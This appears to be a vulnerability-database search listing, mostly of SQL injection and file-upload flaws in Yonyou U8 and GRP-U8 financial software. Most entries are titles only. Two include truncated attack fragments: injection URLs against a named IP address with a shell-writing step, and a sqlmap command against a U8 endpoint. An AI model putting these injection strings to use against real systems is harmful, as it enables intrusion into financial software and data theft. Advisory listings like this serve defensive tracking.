135 matches found
RUSTSEC-2020-0050 VecCopy allows misaligned access to elements
VecCopy::data is created as a Vec of u8 but can be used to store and retrieve elements of different types leading to misaligned access. The issue was resolved in v0.5.0 by replacing data being stored by Vec with a custom managed pointer. Elements are now stored and retrieved using types with prop...
CVE-2020-11650
An issue was discovered in iXsystems FreeNAS and TrueNAS 11.2 before 11.2-u8 and 11.3 before 11.3-U1. It allows a denial of service. The login authentication component has no limits on the length of an authentication message or the rate at which such messages are sent...
DOM Cross-Site Scripting Vulnerability in UFIDA U8+ Financial System
UFIDA U8+ is a fine financial software. A stored cross-site scripting vulnerability exists in the UFIDA U8+ financial system. It allows an attacker to insert malicious js code into a page to obtain user cookies and other information, leading to user hijacking...
用友某系统SQL注入
简要描述: SQL注入未及时升级导致getshell。 详细说明: 存在问题的IP:139.129.98.49 其443、801端口分别运行了U8远程接入应用,存在已知的SQL注入漏洞。 漏洞参考: WooYun: 用友优普U8系统两处sql注入可无限制getshell无需登陆 报错: https://139.129.98.49/Server/CmxcheckBind.php?b=2&a=1%cc 写shell: http://139.129.98.49:801/Server/CmxcheckBind.php?b=2&a=1' and 1=2 union select...
用友GRP-U8财务管理软件 /R9iPortal/cm/cm_info_list.jsp文件itype_id参数SQL注入漏洞
No description provided by source...
用友GRP-U8系统 external 参数uid SQL注入漏洞
No description provided by source...
用友grp-u8 /services/userInfoWeb SQL注入
No description provided by source...
用友GRP-U8 系统登陆处参数UserNameText 存在SQL注入
No description provided by source...
用友的优普U8系统 /Server/CmxUser.php sql盲注
No description provided by source...
用友优普U8系统 /Server/CmxGetAppNameByUserName.php等2处 SQL注入漏洞
0x01漏洞简介 用友优普U8系统在以下2处存在SQL注入漏洞: 1/Server/CmxGetAppNameByUserName.php 参数User 2/Server/CmxCS.php 参数pgid 远程攻击者无需登陆,可以利用该漏洞执行SQL指令。 0x02漏洞利用 1sql注入1 sqlmap.py -u "...:8080/Server/CmxCS.php?pgid=CSRemove" --dbms mysql --technique T --cookie "RASAdminUserInfoUserName=1" --data "CSID=1&CSID=1" -p CSID ...
用友 GRP u8 /persionTreeServlet?bmdm=1 sql注入
No description provided by source...
用友 GRP u8 /IMLoginServlet?uid=1&pwd=1 sql注入
No description provided by source...
用友优普U8系统 Server/CmxRemoteDesktop.php sql注入
No description provided by source...
用友优普U8系统 /Server/CmxMailSet.php sql注入
No description provided by source...
用友优普U8系统 CmxcheckuserMachine.php 参数a SQL注入
No description provided by source...
用友 GRP-u8 /UploadFile 任意文件上传
No description provided by source...
用友GRP-U8 gzQuerydetail 参数KJND SQL注入漏洞
No description provided by source...
用友 GRP-U8管理软件 /IMUnitServlet?pt=add&org_code=1 sql注入
No description provided by source...
用友 GRP-U8管理软件 /IMRoleServlet?pt=del&rolecode=1 sql注入
No description provided by source...
用友 GRP-U8教育财务管理软件 /R9iPortal/cm/cm_function_save.jsp sql注入
No description provided by source...